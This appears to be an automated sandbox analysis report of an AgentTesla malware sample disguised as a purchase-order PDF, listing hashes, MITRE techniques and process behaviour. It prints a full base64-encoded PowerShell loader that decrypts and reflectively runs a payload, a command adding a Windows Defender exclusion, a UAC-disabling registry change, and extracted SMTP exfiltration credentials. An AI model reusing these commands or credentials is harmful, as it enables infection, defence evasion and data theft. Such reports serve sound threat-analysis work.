Analysis
-
max time kernel
1026s -
max time network
614s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
18/05/2024, 21:31
Static task
static1
Behavioral task
behavioral1
Sample
Malware No Po.zip
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
Malware No Po.zip
Resource
win11-20240508-en
General
-
Target
Malware No Po.zip
-
Size
763KB
-
MD5
7fe38f866bdad793c6d0f3eedcf03a1f
-
SHA1
398ae89ceec7709a59f25430317b2069aad88b10
-
SHA256
6c6c3f47c2cc58b4490093a91b5fbc6ab048fa8ff5a50c7bbfff6c46764e3d66
-
SHA512
79246d3270e75efbf6ec97148740b287863aa4b55ae4b8ae39f048d3079f0b5a3e6e0594b41835188b2ad6d7da001f3b3f50211fb87871a1bfe1a16c6beac84c
-
SSDEEP
12288:IxgXo3qzZL50lWsdjPW1sgETvgqo/ej1WpIQRoJQwV4ZeaIqPgm0gAJTn/yefSgB:IGY3CL50FNPW1BETgf/iWUQwesa9YhKA
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.oxatis.com - Port:
587 - Username:
[email protected] - Password:
Sog1952 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe = "0" powershell.exe -
pid Process 3988 powershell.exe 2492 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3988 set thread context of 4972 3988 powershell.exe 139 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 3988 powershell.exe 3988 powershell.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 4972 installutil.exe 4972 installutil.exe 4972 installutil.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2512 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2512 taskmgr.exe Token: SeSystemProfilePrivilege 2512 taskmgr.exe Token: SeCreateGlobalPrivilege 2512 taskmgr.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 4972 installutil.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe 2512 taskmgr.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1384 wrote to memory of 3988 1384 O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe 134 PID 1384 wrote to memory of 3988 1384 O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe 134 PID 3988 wrote to memory of 2492 3988 powershell.exe 137 PID 3988 wrote to memory of 2492 3988 powershell.exe 137 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4972 3988 powershell.exe 139 PID 3988 wrote to memory of 4376 3988 powershell.exe 140 PID 3988 wrote to memory of 4376 3988 powershell.exe 140 PID 3988 wrote to memory of 4376 3988 powershell.exe 140
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Malware No Po.zip"1⤵PID:4800
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1952
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2512
-
C:\Users\Admin\Desktop\O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe"C:\Users\Admin\Desktop\O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADcARAAsACAAMAB4ADkANQAsACAAMAB4ADUAQQAsACAAMAB4ADMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARgAsACAAMAB4ADIAMQAsACAAMAB4ADkAQwAsACAAMAB4ADEAQwAsACAAMAB4AEYANQAsACAAMAB4ADcARQAsACAAMAB4AEEAMwAsACAAMAB4AEYANAAsACAAMAB4ADQARgAsACAAMAB4ADYAOAAsACAAMAB4AEYAMQAsACAAMAB4ADkANgAsACAAMAB4ADkAMQAsACAAMAB4AEEARAAsACAAMAB4AEUARgAsACAAMAB4AEMAMgAsACAAMAB4AEMAOAAsACAAMAB4AEUAMwAsACAAMAB4AEEANwAsACAAMAB4ADcAQgAsACAAMAB4ADgAMQAsACAAMAB4AEYAQgAsACAAMAB4ADIAOQAsACAAMAB4AEQAOAAsACAAMAB4AEQANAAsACAAMAB4ADMAMAAsACAAMAB4ADIAMAApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAyADYALAAgADAAeAAzAEEALAAgADAAeAA0AEIALAAgADAAeAA0ADEALAAgADAAeABGADUALAAgADAAeABGADkALAAgADAAeABEADgALAAgADAAeABDADUALAAgADAAeAA5AEUALAAgADAAeAA4ADEALAAgADAAeAA1AEYALAAgADAAeABEAEEALAAgADAAeAA1ADQALAAgADAAeAA2ADgALAAgADAAeABFADQALAAgADAAeABBADEAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\O▌¼8áü 8¥ÿdó▌ New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe" -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵PID:4376
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
763KB
MD57fe38f866bdad793c6d0f3eedcf03a1f
SHA1398ae89ceec7709a59f25430317b2069aad88b10
SHA2566c6c3f47c2cc58b4490093a91b5fbc6ab048fa8ff5a50c7bbfff6c46764e3d66
SHA51279246d3270e75efbf6ec97148740b287863aa4b55ae4b8ae39f048d3079f0b5a3e6e0594b41835188b2ad6d7da001f3b3f50211fb87871a1bfe1a16c6beac84c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
34KB
MD5c1b8f3a7fc5ee0d440c0d8e2007e5951
SHA12387f4cf70f0006f1b53464cd255076607c626a7
SHA2561a94e878b6ade60c90adb0c4eeaa20ea887fbf58d4bb5ea578e488c1ddaf25cc
SHA512dfb37a6bbd75c7460e1df5de0e2c5b1e928c563344245f78e988174186518255ae7ec32bf77742b313e468687dcea57ef5bcd3ad80347826a42ba837c61acc16